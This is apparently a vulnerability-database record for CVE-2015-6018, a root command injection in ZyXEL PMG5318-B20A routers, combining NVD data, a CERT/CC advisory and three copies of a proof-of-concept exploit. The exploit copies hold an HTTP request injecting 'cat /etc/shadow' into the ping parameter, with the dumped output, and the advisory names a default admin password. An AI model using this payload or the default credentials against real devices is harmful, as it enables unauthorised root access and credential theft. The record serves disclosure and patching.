{"cve": [{"lastseen": "2021-02-02T06:21:27", "description": "The diagnostic-ping implementation on ZyXEL PMG5318-B20A devices with firmware before 1.00(AANC.2)C0 allows remote attackers to execute arbitrary commands via the PingIPAddr parameter.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-12-31T05:59:00", "title": "CVE-2015-6018", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6018"], "modified": "2017-09-15T01:29:00", "cpe": ["cpe:/o:zyxel:pmg5318-b20a_firmware:v100aanc0b5"], "id": "CVE-2015-6018", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6018", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:zyxel:pmg5318-b20a_firmware:v100aanc0b5:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-03-02T01:39:01", "edition": 2, "description": "Exploit for hardware platform in category web applications", "published": "2015-10-14T00:00:00", "type": "zdt", "title": "ZyXEL PMG5318-B20A - OS Command Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-6018"], "modified": "2015-10-14T00:00:00", "id": "1337DAY-ID-24426", 
"href": "https://0day.today/exploit/description/24426", "sourceData": "# Exploit Title: [ZyXEL PMG5318-B20A OS Command Injection Vulnerability]\r\n# Discovered by: Karn Ganeshen\r\n# CERT VU# 870744\r\n# Vendor Homepage: [www.zyxel.com]\r\n# Version Reported: [Firmware version V100AANC0b5]\r\n# CVE-2015-6018 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6018]\r\n \r\n \r\n*Vulnerability Details*\r\n \r\nCWE-20 <http://cwe.mitre.org/data/definitions/20.html>: Improper Input\r\nValidation - CVE-2015-6018\r\n \r\nThe diagnostic ping function's PingIPAddr parameter in the ZyXEL\r\nPMG5318-B20A, firmware version V100AANC0b5, does not properly validate user\r\ninput. An attacker can execute arbitrary commands as root.\r\n \r\n*OS Command Injection PoC*\r\n \r\nThe underlying services are run as 'root'. It therefore, allows dumping\r\nsystem password hashes.\r\n \r\n*HTTP Request*\r\n \r\nPOST /diagnostic/diagnostic_general.cgi HTTP/1.1\r\nHost: <IP>\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101\r\nFirefox/40.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://<IP>/diagnostic/diagnostic_general.cgi\r\nCookie: session=a457f8ad83ba22dc256cd0b002c66666 Connection: keep-alive\r\nContent-Type: multipart/form-data; boundary=--------------------------\r\n-12062103314079176991367286444\r\nContent-Length: 451\r\n \r\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444\r\nContent-Disposition: form-data; name=\"InfoDisplay\u201d\r\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444\r\nContent-Disposition: form-data; name=\"*PingIPAddr*\"\r\n*8.8.8.8; cat /etc/shadow *\r\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444\r\nContent-Disposition: 
form-data; name=\"Submit\"\r\nPing\r\n\u2026.\r\n*HTTP Response *\r\n.....\r\n<snipped>\r\n<br class=\"clearfloat\" />\r\n<!-- configuration beginning -->\r\n<div class=\"headline\"><span class=\"cTitle\">General</span></div> <table\r\nwidth=\"90%\" border=\"0\" align=\"center\" cellpadding=\"0\" cellspacing=\"0\"\r\nclass=\"cfgpadding\">\r\n<tr>\r\n<td nowrap=\"nowrap\"><textarea name=\"InfoDisplay\" rows=\"15\" cols=\"100\"\r\nreadonly=\"readonly\u201d>\r\n \r\n \r\n*root:<hash>:15986:0:99999:7:::\r\nlp:*:13013:0:99999:7:::nobody:*:13013:0:99999:7:::admin:<hash>:16035:0:99999:7:::\r\nuser:<hash>:16035:0:99999:7:::*\r\n </textarea></td>\r\n</tr>\r\n</table>\r\n<table width=\"90%\" border=\"0\" align=\"center\" cellpadding=\"0\"\r\ncellspacing=\"0\" class=\"cfgpadding\">\r\n<tr>\r\n-----------------------------12062103314079176991367286444--\n\n# 0day.today [2018-03-01] #", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/24426"}], "exploitdb": [{"lastseen": "2016-02-04T08:08:05", "description": "ZyXEL PMG5318-B20A - OS Command Injection Vulnerability. CVE-2015-6018. 
Webapps exploit for hardware platform", "published": "2015-10-14T00:00:00", "type": "exploitdb", "title": "ZyXEL PMG5318-B20A - OS Command Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-6018"], "modified": "2015-10-14T00:00:00", "id": "EDB-ID:38455", "href": "https://www.exploit-db.com/exploits/38455/", "sourceData": "# Exploit Title: [ZyXEL PMG5318-B20A OS Command Injection Vulnerability]\r\n# Discovered by: Karn Ganeshen\r\n# CERT VU# 870744\r\n# Vendor Homepage: [www.zyxel.com]\r\n# Version Reported: [Firmware version V100AANC0b5]\r\n# CVE-2015-6018 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6018]\r\n\r\n\r\n*Vulnerability Details*\r\n\r\nCWE-20 <http://cwe.mitre.org/data/definitions/20.html>: Improper Input\r\nValidation - CVE-2015-6018\r\n\r\nThe diagnostic ping function's PingIPAddr parameter in the ZyXEL\r\nPMG5318-B20A, firmware version V100AANC0b5, does not properly validate user\r\ninput. An attacker can execute arbitrary commands as root.\r\n\r\n*OS Command Injection PoC*\r\n\r\nThe underlying services are run as 'root'. 
It therefore, allows dumping\r\nsystem password hashes.\r\n\r\n*HTTP Request*\r\n\r\nPOST /diagnostic/diagnostic_general.cgi HTTP/1.1\r\nHost: <IP>\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101\r\nFirefox/40.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://<IP>/diagnostic/diagnostic_general.cgi\r\nCookie: session=a457f8ad83ba22dc256cd0b002c66666 Connection: keep-alive\r\nContent-Type: multipart/form-data; boundary=--------------------------\r\n-12062103314079176991367286444\r\nContent-Length: 451\r\n\r\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444\r\nContent-Disposition: form-data; name=\"InfoDisplay\u201d\r\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444\r\nContent-Disposition: form-data; name=\"*PingIPAddr*\"\r\n*8.8.8.8; cat /etc/shadow *\r\n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444\r\nContent-Disposition: form-data; name=\"Submit\"\r\nPing\r\n\u2026.\r\n*HTTP Response *\r\n.....\r\n<snipped>\r\n<br class=\"clearfloat\" />\r\n<!-- configuration beginning -->\r\n<div class=\"headline\"><span class=\"cTitle\">General</span></div> <table\r\nwidth=\"90%\" border=\"0\" align=\"center\" cellpadding=\"0\" cellspacing=\"0\"\r\nclass=\"cfgpadding\">\r\n<tr>\r\n<td nowrap=\"nowrap\"><textarea name=\"InfoDisplay\" rows=\"15\" cols=\"100\"\r\nreadonly=\"readonly\u201d>\r\n\r\n\r\n*root:<hash>:15986:0:99999:7:::\r\nlp:*:13013:0:99999:7:::nobody:*:13013:0:99999:7:::admin:<hash>:16035:0:99999:7:::\r\nuser:<hash>:16035:0:99999:7:::*\r\n </textarea></td>\r\n</tr>\r\n</table>\r\n<table width=\"90%\" border=\"0\" align=\"center\" cellpadding=\"0\"\r\ncellspacing=\"0\" 
class=\"cfgpadding\">\r\n<tr>\r\n-----------------------------12062103314079176991367286444--", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/38455/"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:16", "description": "", "published": "2015-10-14T00:00:00", "type": "packetstorm", "title": "ZyXEL PMG5318-B20A OS Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-6018"], "modified": "2015-10-14T00:00:00", "id": "PACKETSTORM:133960", "href": "https://packetstormsecurity.com/files/133960/ZyXEL-PMG5318-B20A-OS-Command-Injection.html", "sourceData": "`# Exploit Title: [ZyXEL PMG5318-B20A OS Command Injection Vulnerability] \n# Discovered by: Karn Ganeshen \n# CERT VU# 870744 \n# Vendor Homepage: [www.zyxel.com] \n# Version Reported: [Firmware version V100AANC0b5] \n# CVE-2015-6018 [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6018 \n] \n \n \n*Vulnerability Details* \n \nCWE-20 <http://cwe.mitre.org/data/definitions/20.html>: Improper Input \nValidation - CVE-2015-6018 \n \nThe diagnostic ping function's PingIPAddr parameter in the ZyXEL \nPMG5318-B20A, firmware version V100AANC0b5, does not properly validate user \ninput. An attacker can execute arbitrary commands as root. \n \n*OS Command Injection PoC* \n \nThe underlying services are run as 'root'. It therefore, allows dumping \nsystem password hashes. 
\n \n*HTTP Request* \n \nPOST /diagnostic/diagnostic_general.cgi HTTP/1.1 \nHost: <IP> \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 \nFirefox/40.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://<IP>/diagnostic/diagnostic_general.cgi \nCookie: session=a457f8ad83ba22dc256cd0b002c66666 Connection: keep-alive \nContent-Type: multipart/form-data; boundary=-------------------------- \n-12062103314079176991367286444 \nContent-Length: 451 \n \n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444 \nContent-Disposition: form-data; name=\"InfoDisplay\u201d \n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444 \nContent-Disposition: form-data; name=\"*PingIPAddr*\" \n*8.8.8.8; cat /etc/shadow * \n\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u2014\u201412062103314079176991367286444 \nContent-Disposition: form-data; name=\"Submit\" \nPing \n\u2026. \n*HTTP Response * \n..... 
\n<snipped> \n<br class=\"clearfloat\" /> \n<!-- configuration beginning --> \n<div class=\"headline\"><span class=\"cTitle\">General</span></div> <table \nwidth=\"90%\" border=\"0\" align=\"center\" cellpadding=\"0\" cellspacing=\"0\" \nclass=\"cfgpadding\"> \n<tr> \n<td nowrap=\"nowrap\"><textarea name=\"InfoDisplay\" rows=\"15\" cols=\"100\" \nreadonly=\"readonly\u201d> \n \n \n*root:<hash>:15986:0:99999:7::: \nlp:*:13013:0:99999:7:::nobody:*:13013:0:99999:7:::admin:<hash>:16035:0:99999:7::: \nuser:<hash>:16035:0:99999:7:::* \n</textarea></td> \n</tr> \n</table> \n<table width=\"90%\" border=\"0\" align=\"center\" cellpadding=\"0\" \ncellspacing=\"0\" class=\"cfgpadding\"> \n<tr> \n-----------------------------12062103314079176991367286444-- \n \n-- \nBest Regards, \nKarn Ganeshen \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/133960/zyxelpmg5318-exec.txt"}], "cert": [{"lastseen": "2020-09-18T20:43:05", "bulletinFamily": "info", "cvelist": ["CVE-2015-6016", "CVE-2015-6017", "CVE-2015-6018", "CVE-2015-6019", "CVE-2015-6020"], "description": "### Overview \n\nSeveral models of ZyXEL routers are vulnerable to multiple issues, including weak default passwords, command injections due to improper input validation, and cross-site scripting.\n\n### Description \n\n[**CWE-255**](<http://cwe.mitre.org/data/definitions/255.html>)**: Credentials Management - **CVE-2015-6016\n\nAccording to the reporter, the following models contain the weak default password of \"1234\" for the `admin` account: \n\n\n * the ZyXEL P-660HW-T1 v2 with ZyNOS firmware version: V3.40(AXH.0) (dated 3/30/2007)\n * the ZyXEL PMG5318-B20A, firmware version V100AANC0b5\n * the ZyXEL NBG-418N\n \n[Many more models](<https://default-password.info/zyxel/>) have been reported to share this same password. 
\n \n[**CWE-80**](<http://cwe.mitre.org/data/definitions/80.html>)**: Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)** \\- CVE-2015-6017 \n \nAccording to the reporter, a reflected cross site scripting vulnerability exists in the `LoginPassword` and `hiddenPassword` parameters of the `/Forms/rpAuth_1` page on the ZyXEL P-660HW-T1 v2 with ZyNOS firmware version: V3.40(AXH.0) (dated 3/30/2007). \n \n[**CWE-20**](<http://cwe.mitre.org/data/definitions/20.html>)**: Improper Input Validation** \\- CVE-2015-6018 \n \nAccording to the reporter, the diagnostic ping function's `PingIPAddr` parameter in the ZyXEL PMG5318-B20A, firmware version V100AANC0b5, does not properly validate user input. An attacker may be able to execute arbitrary commands as root. \n \n[**CWE-613**](<http://cwe.mitre.org/data/definitions/613.html>)**: Insufficient Session Expiration** \\- CVE-2015-6019 \n \nAccording to the reporter, the ZyXEL PMG5318-B20A, firmware version V100AANC0b5 does not properly expire the session when a user logs out of the management portal. The reporter has confirmed the session remains active for at least 1 hour after log off. An attacker may be able to utilize session information to gain access to the device even after the user has logged off. \n \n[**CWE-285**](<http://cwe.mitre.org/data/definitions/285.html>)**: Improper Authorization** \\- CVE-2015-6020 \n \nAccording to the reporter, the regular `user` account on the ZyXEL PMG5318-B20A, firmware version V100AANC0b5 has full administrative access, rather than restricted access. \n--- \n \n### Impact \n\nA remote unauthenticated attacker may be able to modify system configuration. \n \n--- \n \n### Solution \n\n**Apply updates and other changes** \n \nZyXEL has previously addressed some issues, and will address the remaining issues in October 2015. 
\n \nZyXEL has provided the following summary of responses to these issues: \n \n \n \nZyXEL has also provided the following responses: \n \nFor CVE-2015-6016: \n \n_\"ZyXEL suggests users of all products change the default password upon initial log-in. This is critical to protecting your network by keeping any unauthorized users from gaining access via the default password. ZyXEL has included reminders for this practice on a majority of products. Changing the default password upon initial log-in is mandatory for the ZyXEL USG/ZyWALL, UAG, and LTE Series.\"_ \n \nFor CVE-2015-6017: \n \n_\"Model P660HW-T1 v2 (ZyNOS v3.40) was designated \"end-of-life\" on May 14, 2010. ZyXEL assigns a product an \"end-of-life\" status when there is a clear indication that the market has transitioned to its replacement. This replacement generally offers advanced technology and/or better economics._ \n \n_ZyXEL recommends users replace P660HW-T1 v2 with newer generations of DSL CPEs that better suit the network environment today. Or alternatively, as a good general security practice, ZyXEL suggests that users avoid visiting untrusted sites or clicking on unsolicited links. It is also recommended that users keep their browser, computer operating system, and security software current with the latest patches and updates.\"_ \n \nFor CVE-2015-6018: \n \n_\"This issue was patched via a firmware update in December 2014 (version v1.00(AANC.2)C0), which included feature enhancements, as well as bug and security fixes. ZyXEL recommends that users go to the _[_support site_](<http://www.zyxel.com/support/support_landing.shtml>)_ to obtain the latest update.\"_ \n \nFor CVE-2015-6019 and CVE-2015-6020: \n \nZyXEL has released firmware version `V1.00(AANC.3)b1` to address these issues in PMG5318-20A. 
\n \n--- \n \n### Vendor Information\n\n870744\n\n### ZyXEL Affected\n\nNotified: August 25, 2015 Updated: October 13, 2015 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nZyXEL has also provided the following responses:\n\nFor CVE-2015-6016: \n \n\"ZyXEL suggests users of all products change the default password upon initial log-in. This is critical to protecting your network by keeping any unauthorized users from gaining access via the default password. ZyXEL has included reminders for this practice on a majority of products. Changing the default password upon initial log-in is mandatory for the ZyXEL USG/ZyWALL, UAG, and LTE Series.\" \n \nFor CVE-2015-6017: \n \n\"Model P660HW-T1 v2 (ZyNOS v3.40) was designated \"end-of-life\" on May 14, 2010. ZyXEL assigns a product an \"end-of-life\" status when there is a clear indication that the market has transitioned to its replacement. This replacement generally offers advanced technology and/or better economics. \n \nZyXEL recommends users replace P660HW-T1 v2 with newer generations of DSL CPEs that better suit the network environment today. Or alternatively, as a good general security practice, ZyXEL suggests that users avoid visiting untrusted sites or clicking on unsolicited links. It is also recommended that users keep their browser, computer operating system, and security software current with the latest patches and updates.\" \n \nFor CVE-2015-6018: \n \n\"This issue was patched via a firmware update in December 2014 (version v1.00(AANC.2)C0), which included feature enhancements, as well as bug and security fixes. 
ZyXEL recommends that users go to the [support site](<http://www.zyxel.com/support/support_landing.shtml>) to obtain the latest update.\" \n \nFor CVE-2015-6019 and CVE-2015-6020: \n \n\"ZyXEL has identified the root causes and will release a patch for PMG5318-20A in October 2015 to solve the session expiration and authorization issues.\"\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 8.3 | AV:A/AC:L/Au:N/C:C/I:C/A:C \nTemporal | 7.1 | E:POC/RL:U/RC:UR \nEnvironmental | 5.3 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n<http://www.zyxel.com/support/support_landing.shtml>\n\n### Acknowledgements\n\nThanks to Joel Land for reporting the vulnerability in the NBG-418N. Thanks to Karn Ganeshen for reporting the remaining vulnerabilities to us.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2015-6016](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-6016>), [CVE-2015-6017](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-6017>), [CVE-2015-6018](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-6018>), [CVE-2015-6019](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-6019>), [CVE-2015-6020](<http://web.nvd.nist.gov/vuln/detail/CVE-2015-6020>) \n---|--- \n**Date Public:** | 2015-10-13 \n**Date First Published:** | 2015-10-13 \n**Date Last Updated: ** | 2015-10-29 13:38 UTC \n**Document Revision: ** | 45 \n", "modified": "2015-10-29T13:38:00", "published": "2015-10-13T00:00:00", "id": "VU:870744", "href": "https://www.kb.cert.org/vuls/id/870744", "type": "cert", "title": "ZyXEL NBG-418N, PMG5318-B20A and P-660HW-T1 routers contain multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}